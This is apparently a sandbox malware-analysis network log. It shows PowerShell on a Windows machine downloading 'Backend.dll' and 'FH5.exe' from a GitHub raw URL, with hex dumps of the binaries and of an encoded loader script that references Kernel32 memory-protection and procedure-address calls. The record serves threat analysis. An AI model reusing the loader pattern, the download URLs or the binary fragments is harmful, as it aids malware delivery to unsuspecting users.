                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 34 42 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 33 33 2c 20 30 78 30 30 2c 20 30 78 33 32 2c 20 30 78 30 30 2c 20 30 78 34 43 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 32 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 37 39 2c 20 30 78 30 30 2c 20 30 78 32 39 2c 20 30 78 30 30 2c 20 30 78 35 44 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30
                                                                        Data Ascii: 0x00, 0x72, 0x00, 0x74, 0x00, 0x28, 0x00, 0x4B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x62, 0x00, 0x72, 0x00, 0x61, 0x00, 0x72, 0x00, 0x79, 0x00, 0x29, 0x00, 0x5D, 0x00, 0x0A, 0x0
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 43 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 35 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 36 36 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 34 46 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30
                                                                        Data Ascii: , 0x00, 0x63, 0x00, 0x74, 0x00, 0x2C, 0x00, 0x20, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x75, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x20, 0x00, 0x6C, 0x00, 0x70, 0x00, 0x66, 0x00, 0x6C, 0x00, 0x4F, 0x00, 0x6C, 0x00, 0x64, 0x00, 0x50, 0
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 38 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 36 37 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 39 2c 20 30 78 30 30 2c 20 30 78 36 32 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 31 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 37 39 2c
                                                                        Data Ascii: 41, 0x00, 0x64, 0x00, 0x64, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x28, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x62, 0x00, 0x72, 0x00, 0x61, 0x00, 0x72, 0x00, 0x79,
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 30 78 36 43 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 45 2c 20 30 78 30 30 2c 20 30 78 35 41 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 32 39 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 42 2c 20 30 78 30 30 2c 20 30 78 30 41 2c 20 30 78 30 30 2c 20 30 78 32
                                                                        Data Ascii: 0x6C, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x2E, 0x00, 0x5A, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x29, 0x00, 0x20, 0x00, 0x7B, 0x00, 0x0A, 0x00, 0x2
                                                                        2024-10-15 14:00:03 UTC1378INData Raw: 2c 20 30 78 34 39 2c 20 30 78 30 30 2c 20 30 78 36 45 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 35 30 2c 20 30 78 30 30 2c 20 30 78 37 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 37 30 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 46 2c 20 30 78 30 30 2c 20 30 78 36 33 2c 20 30 78 30 30 2c 20 30 78 34 31 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 36 34 2c 20 30 78 30 30 2c 20 30 78 37 32 2c 20 30 78 30 30 2c 20 30 78 36 35 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 37 33 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30 78 33 44 2c 20 30 78 30 30 2c 20 30 78 32 30 2c 20 30 78 30 30 2c 20 30
                                                                        Data Ascii: , 0x49, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x50, 0x00, 0x74, 0x00, 0x72, 0x00, 0x20, 0x00, 0x70, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x63, 0x00, 0x41, 0x00, 0x64, 0x00, 0x64, 0x00, 0x72, 0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549769185.199.110.1334437428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:06 UTC200OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        2024-10-15 14:00:07 UTC903INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 31744
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: application/octet-stream
                                                                        ETag: "bd4b192ae5469f45e129df181fc4929ee39a6dc957f48659a8b8da2b1d018ac5"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: 12C4:3C9FB5:238FE3B:275B85C:670E7565
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:07 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdfw8210120-DFW
                                                                        X-Cache: MISS
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729000807.990380,VS0,VE140
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: 469a1d65fad5861e8ccf7bf345fe18f1d2ad5847
                                                                        Expires: Tue, 15 Oct 2024 14:05:07 GMT
                                                                        Source-Age: 0
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a c7 bb 58 1e a6 d5 0b 1e a6 d5 0b 1e a6 d5 0b 17 de 46 0b 18 a6 d5 0b 4c d3 d0 0a 0e a6 d5 0b 4c d3 d1 0a 16 a6 d5 0b 4c d3 d6 0a 1d a6 d5 0b 4c d3 d4 0a 18 a6 d5 0b cd d4 d4 0a 1b a6 d5 0b 1e a6 d4 0b 59 a6 d5 0b ab d3 dc 0a 0e a6 d5 0b ab d3 d5 0a 1f a6 d5 0b ab d3 2a 0b 1f a6 d5 0b ab d3 d7 0a 1f a6 d5 0b 52 69 63 68 1e a6 d5 0b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ZXFLLLLY*RichPEd
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 08 ff 15 c7 4e 00 00 48 8b 05 d0 6e 00 00 4c 8d 45 30 48 8b 55 30 41 b9 08 00 00 00 48 83 c2 50 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 98 4e 00 00 48 8b 05 a1 6e 00 00 4c 8d 45 30 48 8b 55 30 41 b9 08 00 00 00 48 81 c2 d0 00 00 00 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 66 4e 00 00 48 8b 05 6f 6e 00 00 4c 8d 45 30 48 8b 55 30 41 b9 08 00 00 00 48 83 c2 18 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 37 4e 00 00 48 8b 05 40 6e 00 00 4c 8d 45 30 48 8b 55 30 41 b9 08 00 00 00 48 83 c2 50 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 08 4e 00 00 48 8b 7d 30 85 db 74 31 48 8b 05 09 6e 00 00 48 8d 97 a8 00 00 00 89 5d 30 4c 8d 45 30 41 b9 04 00 00 00 48 8b 08 48 8d 45 38 48 89 44 24 20 48 8b 49 08 ff 15 af 4d 00 00
                                                                        Data Ascii: NHnLE0HU0AHPHHE8HD$ HINHnLE0HU0AHHHE8HD$ HIfNHonLE0HU0AHHHE8HD$ HI7NH@nLE0HU0AHPHHE8HD$ HINH}0t1HnH]0LE0AHHE8HD$ HIM
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 2f 49 8b c8 e8 32 32 00 00 48 8b 0b ba 10 00 00 00 48 89 33 48 89 73 10 48 89 73 08 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f e9 0b 32 00 00 ff 15 f5 4a 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 10 48 89 6c 24 18 56 57 41 57 48 83 ec 20 48 8b 69 18 49 8b f0 4c 8b fa 48 8b d9 4c 3b c5 77 21 48 8b f9 48 83 fd 10 72 03 48 8b 39 48 89 71 10 48 8b cf e8 57 3d 00 00 c6 04 37 00 e9 ef 00 00 00 48 bf ff ff ff ff ff ff ff 7f 48 3b f7 0f 87 f9 00 00 00 48 8b ce 4c 89 74 24 40 48 83 c9 0f 48 3b cf 77 3a 48 8b d5 48 8b c7 48 d1 ea 48 2b c2 48 3b e8 77 29 48 8d 04 2a 48 8b f9 48 3b c8 48 0f 42 f8 48 8d 47 01 48 3d 00 10 00 00 72 35 48 8d 48 27 48 3b c8 0f 86 b6 00 00 00 eb 0a
                                                                        Data Ascii: rLAH'I+HAHw/I22HH3HsHsH\$0Ht$8H _2JH\$Hl$VWAWH HiILHL;w!HHrH9HqHW=7HH;HLt$@HH;w:HHHH+H;w)H*HH;HBHGH=r5HH'H;
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: ee 2c 00 00 90 41 b9 00 40 00 00 4d 8b 47 10 49 8b 57 08 49 8b 0f ff 15 be 43 00 00 ba 18 00 00 00 49 8b cf e8 c9 2c 00 00 90 4d 85 ed 74 36 4d 2b e5 49 8b c5 49 81 fc 00 10 00 00 72 1c 49 83 c4 27 4d 8b 6d f8 49 2b c5 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 89 45 00 00 cc 49 8b d4 49 8b cd e8 8d 2c 00 00 48 8b 4d 27 48 33 cc e8 d9 28 00 00 4c 8d 9c 24 d0 00 00 00 49 8b 5b 30 49 8b 73 40 49 8b 7b 48 49 8b e3 41 5f 41 5e 41 5d 41 5c 5d c3 e8 93 22 00 00 90 cc cc 40 53 48 83 ec 20 48 8b d9 48 8b 09 48 85 c9 74 3a 48 8b 53 10 48 2b d1 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 1b 49 8b c8 e8 1a 2c 00 00 33 c0 48 89 03 48 89 43 08 48 89 43 10 48 83 c4 20 5b c3 ff 15 f1 44 00 00 cc cc cc cc cc cc cc cc cc 48 8b 15 c1 6b
                                                                        Data Ascii: ,A@MGIWICI,Mt6M+IIrI'MmI+HHvEII,HM'H3(L$I[0Is@I{HIA_A^A]A\]"@SH HHHt:HSH+HrLAH'I+HAHwI,3HHCHCH [DHk
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 8b c7 f0 0f c1 43 0c 83 f8 01 75 09 48 8b 03 48 8b cb ff 50 08 48 8b 05 a4 5e 00 00 48 85 c0 74 04 f0 ff 40 08 48 8b 05 8c 5e 00 00 48 89 05 55 67 00 00 48 8b 05 86 5e 00 00 48 8b 1d 4f 67 00 00 48 89 05 48 67 00 00 48 85 db 74 27 8b c7 f0 0f c1 43 08 83 f8 01 75 1b 48 8b 03 48 8b cb ff 10 f0 0f c1 7b 0c 83 ff 01 75 09 48 8b 03 48 8b cb ff 50 08 b0 01 eb 02 32 c0 48 8b 8c 24 80 01 00 00 48 33 cc e8 5e 23 00 00 4c 8d 9c 24 90 01 00 00 49 8b 5b 10 49 8b 73 18 49 8b e3 5f c3 cc cc cc cc cc cc cc cc cc 48 89 5c 24 18 55 56 57 41 56 41 57 48 81 ec 90 01 00 00 48 8b 05 c6 5d 00 00 48 33 c4 48 89 84 24 80 01 00 00 4c 8b f2 48 8b e9 48 8b 05 d6 5d 00 00 8b 30 33 d2 8d 4a 02 ff 15 f1 3d 00 00 48 8b d8 45 33 ff 48 c7 c7 ff ff ff ff 48 3b c7 0f 84 76 01 00 00 c7 44
                                                                        Data Ascii: CuHHPH^Ht@H^HUgH^HOgHHgHt'CuHH{uHHP2H$H3^#L$I[IsI_H\$UVWAVAWHH]H3H$LHH]03J=HE3HH;vD
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 8b 01 48 8d 54 24 40 48 3b ca 0f 95 c2 ff 50 20 48 8b 8c 24 80 00 00 00 48 33 cc e8 66 1e 00 00 48 8b 9c 24 a0 00 00 00 48 81 c4 90 00 00 00 5f c3 cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 55 48 8d 6c 24 a9 48 81 ec d0 00 00 00 48 8b 05 cd 58 00 00 48 33 c4 48 89 45 47 48 8d 05 cf 3c 00 00 48 89 45 e7 c7 45 ef 47 01 86 01 c7 45 f3 53 01 2b 01 c7 45 f7 1f 01 47 01 c7 45 fb 86 01 73 01 c7 45 ff 2b 01 17 01 c7 45 03 5a 01 47 01 c7 45 07 82 01 63 01 c7 45 0b 2b 01 a6 01 c7 45 0f 47 01 8e 01 c7 45 13 e3 01 bf 01 c7 45 17 0f 01 0f 01 c7 45 1b 0f 01 3c 01 c7 45 1f d4 01 86 01 c7 45 23 52 01 68 01 c7 45 27 47 01 84 01 c7 45 2b 76 01 57 01 48 8b 1d 74 58 00 00 48 8d 55 b7 48 8d 4d e7 e8 47 08 00 00 90 48 8b 45 b7 48 8b 55 bf 48 3b c2 74 12 80 78
                                                                        Data Ascii: HT$@H;P H$H3fH$H_H\$Ht$H|$UHl$HHXH3HEGH<HEEGES+EGEsE+EZGEcE+EGEEE<EE#RhE'GE+vWHtXHUHMGHEHUH;tx
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 04 41 ff d0 90 48 8b 45 b7 48 8b 55 bf 48 3b c2 74 14 66 90 80 78 01 00 74 03 80 30 0f 48 83 c0 02 48 3b c2 75 ee 4c 8d 45 b7 48 8d 55 cf 48 8b cb e8 4e 11 00 00 90 48 8b 4d b7 48 85 c9 74 3b 48 8b 45 c7 48 2b c1 48 d1 f8 48 8d 14 00 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 47 35 00 00 cc e8 51 1c 00 00 48 8b 5d cf 48 8d 7b 08 48 8b 05 6a 53 00 00 48 8b 08 48 8d 45 d7 48 89 44 24 20 41 b9 04 00 00 00 4c 8d 45 cf 48 8b d7 48 8b 49 08 ff 15 37 33 00 00 48 63 4d cf 48 83 c1 04 48 03 cf 48 89 0d fd 5b 00 00 48 83 c3 57 48 89 1d 2a 5c 00 00 48 8d 86 80 64 00 00 48 89 45 e7 c7 45 ef 00 01 8a 01 c7 45 f3 c3 01 0f 01 c7 45 f7 0f 01 0f 01 c7 45 fb 47 01 84 01 48 c7 45 ff 32 01 00 00 c7 45 07 00 00 47
                                                                        Data Ascii: AHEHUH;tfxt0HH;uLEHUHNHMHt;HEH+HHHHrH'HIH+HHvG5QH]H{HjSHHEHD$ ALEHHI73HcMHHH[HWH*\HdHEEEEEGHE2EG
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 18 4c 89 64 24 20 55 41 56 41 57 48 8b ec 48 83 ec 70 48 8b 05 49 4e 00 00 48 33 c4 48 89 45 f0 48 83 3d a2 57 00 00 00 0f 85 ce 04 00 00 0f 57 c9 f3 0f 7f 4d c8 45 33 e4 4c 89 65 d8 c7 45 e0 55 48 89 e5 c7 45 e4 48 83 ec 20 41 8d 54 24 08 48 8d 4d c8 e8 49 0f 00 00 48 8d 7d e0 48 8b 75 d8 48 8b 5d d0 48 3b de 74 0e 0f b6 07 88 03 48 ff c3 48 89 5d d0 eb 17 4c 8b c7 48 8b d3 48 8d 4d c8 e8 3b 0d 00 00 48 8b 75 d8 48 8b 5d d0 48 ff c7 48 8d 45 e8 48 3b f8 75 ca 66 c7 45 e0 48 b8 48 8b 05 ea 56 00 00 48 89 45 e2 48 8b c6 48 2b 45 c8 48 83 f8 0a 73 16 ba 0a 00 00 00 48 8d 4d c8 e8 db 0e 00 00 48 8b 75 d8 48 8b 5d d0 48 8d 7d e0 48 3b de 74 0e 0f b6 07 88 03 48 ff c3 48 89 5d d0 eb 17 4c 8b c7 48 8b d3 48 8d 4d c8 e8 cd 0c 00 00 48 8b 75 d8 48 8b 5d d0 48 ff
                                                                        Data Ascii: Ld$ UAVAWHHpHINH3HEH=WWME3LeEUHEH AT$HMIH}HuH]H;tHH]LHHM;HuH]HHEH;ufEHHVHEHH+EHsHMHuH]H}H;tHH]LHHMHuH]H
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 83 3d 59 52 00 00 00 0f 84 15 04 00 00 48 83 3d 53 52 00 00 00 74 51 48 8b 05 12 49 00 00 48 8b 08 48 8d 45 17 48 89 44 24 20 41 b9 1a 00 00 00 4c 8d 45 27 48 8b 15 f5 51 00 00 48 8b 49 08 ff 15 db 28 00 00 41 b8 1a 00 00 00 48 8d 15 ee 48 00 00 48 8d 4d 27 e8 3c 1d 00 00 85 c0 0f 95 c0 84 c0 0f 85 ba 03 00 00 e8 23 fa ff ff 48 8b 0d dc 51 00 00 48 ff c9 48 23 0d da 51 00 00 48 8b 05 c3 51 00 00 48 8b 14 c8 45 33 f6 4c 89 75 f7 4c 89 75 07 4c 89 75 0f 0f 10 02 0f 11 45 f7 0f 10 4a 10 0f 11 4d 07 4c 89 72 10 48 c7 42 18 0f 00 00 00 44 88 32 48 8b 0d 93 51 00 00 48 ff c9 48 23 0d 91 51 00 00 48 8b 05 7a 51 00 00 48 8b 1c c8 48 8b 53 18 48 83 fa 10 72 30 48 8b 0b 48 ff c2 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 4c 8b 41 f8 49 2b c8 48 8d 41 f8 48 83 f8 1f 0f
                                                                        Data Ascii: =YRH=SRtQHIHHEHD$ ALE'HQHI(AHHHM'<#HQHH#QHQHE3LuLuLuEJMLrHBD2HQHH#QHzQHHSHr0HHHrH'LAI+HAH
                                                                        2024-10-15 14:00:07 UTC1378INData Raw: 48 8b cf e8 39 18 00 00 48 8b 15 d7 4c 00 00 48 03 df 48 8b cb 4c 3b fd 77 25 4d 8b c6 e8 1f 18 00 00 4c 8b c5 49 8d 0c 1e 4d 2b c7 33 d2 49 c1 e0 03 e8 99 16 00 00 4d 8b c6 48 8b ce eb 34 48 8d 3c ed 00 00 00 00 4c 8b c7 e8 f2 17 00 00 48 8b 05 90 4c 00 00 48 8b ce 49 8d 1c 06 48 8d 14 07 48 2b da 4c 8b c3 e8 d5 17 00 00 48 8d 0c 33 4c 8b c7 33 d2 e8 56 16 00 00 48 8b 0d 65 4c 00 00 4c 8b 74 24 28 48 8b 7c 24 30 48 8b 5c 24 40 48 85 c9 74 35 48 8b 05 52 4c 00 00 48 8d 14 c5 00 00 00 00 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 2a 49 8b c8 e8 dc 0b 00 00 48 01 2d 1d 4c 00 00 48 8b 6c 24 48 4c 8b 7c 24 20 48 89 35 04 4c 00 00 48 8b 74 24 50 48 83 c4 38 c3 ff 15 a4 24 00 00 cc e8 96 d6 ff ff cc e8 10 00 00 00 cc
                                                                        Data Ascii: H9HLHHL;w%MLIM+3IMH4H<LHLHIHH+LH3L3VHeLLt$(H|$0H\$@Ht5HRLHHrLAH'I+HAHw*IH-LHl$HL|$ H5LHt$PH8$


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549774185.199.110.1334437428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:08 UTC196OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        2024-10-15 14:00:08 UTC903INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 56320
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: application/octet-stream
                                                                        ETag: "fbd9a681f4acce63a6718a2c29c8db9ab29a56e7e684d03951f580344762e00e"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: 8F93:1FAF94:230D314:26D8CBF:670E7565
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:08 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdal2120106-DFW
                                                                        X-Cache: MISS
                                                                        X-Cache-Hits: 0
                                                                        X-Timer: S1729000808.156831,VS0,VE179
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: be78787e065e4227f0a8f309434b64e83291349e
                                                                        Expires: Tue, 15 Oct 2024 14:05:08 GMT
                                                                        Source-Age: 0
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 9d f8 f7 ed 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 86 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0T @ `@@
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 00 0a 28 07 00 00 06 2a a6 02 7b 04 00 00 04 6f 25 00 00 0a 2c 16 02 7b 05 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 08 00 00 06 2a 28 09 00 00 06 2a 8e 02 7b 04 00 00 04 6f 25 00 00 0a 2c 15 02 7b 05 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 08 00 00 06 2a 46 02 7b 13 00 00 04 6f 38 00 00 0a 28 0c 00 00 06 2a 5a 02 7b 16 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 0a 00 00 06 2a 1a 28 0b 00 00 06 2a 7a 03 2c 13 02 7b 01 00 00 04 2c 0b 02 7b 01 00 00 04 6f 31 00 00 0a 02 03 28 39 00 00 0a 2a 00 13 30 05 00 2c 0d 00 00 04 00 00 11 02 73 3a 00 00 0a 7d 01 00 00 04 d0 03 00 00 02 28 3b 00 00 0a 73 3c 00 00 0a 0a 02 73 3d 00 00 0a 7d 02 00 00 04 02 73 3e 00 00 0a 7d 03 00 00 04 02 73 3f 00 00 0a 7d 04 00 00 04 02 73 40 00 00 0a 7d 05 00 00 04 02 73 41 00 00 0a
                                                                        Data Ascii: (*{o%,{o6(7(*(*{o%,{o6(7(*F{o8(*Z{o6(7(*(*z,{,{o1(9*0,s:}(;s<s=}s>}s?}s@}sA
